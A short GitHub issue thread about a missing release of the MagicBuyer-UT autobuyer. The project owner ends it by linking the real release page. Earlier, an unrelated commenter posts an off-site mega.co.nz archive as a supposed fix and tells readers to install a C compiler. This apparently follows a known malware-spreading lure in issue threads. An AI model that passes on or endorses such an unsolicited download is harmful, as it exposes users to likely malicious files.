### ISSUE TITLE
Cant find the release

### ISSUE THREAD

**Issue by BandietosGaming** [AMINE1921/MagicBuyer-UT#1]
Hey! 

I love to use the autobuyer, but if i click on the newest release link, there is nothing?

**Comment by websquadpro** [comment]
This might help:This file might fix it
https://mega.co.nz/#!9vE0jIrD!nkSuAAbrT1Sjn01VjaQfVQGAFLqvdIF4EkMeSLuKCWw
If you don't have the c compliator, install it.(gcc or clang)

**Comment by AMINE1921** [comment]
@BandietosGaming https://github.com/AMINE1921/MagicBuyer-UT/releases/tag/v2.0.0
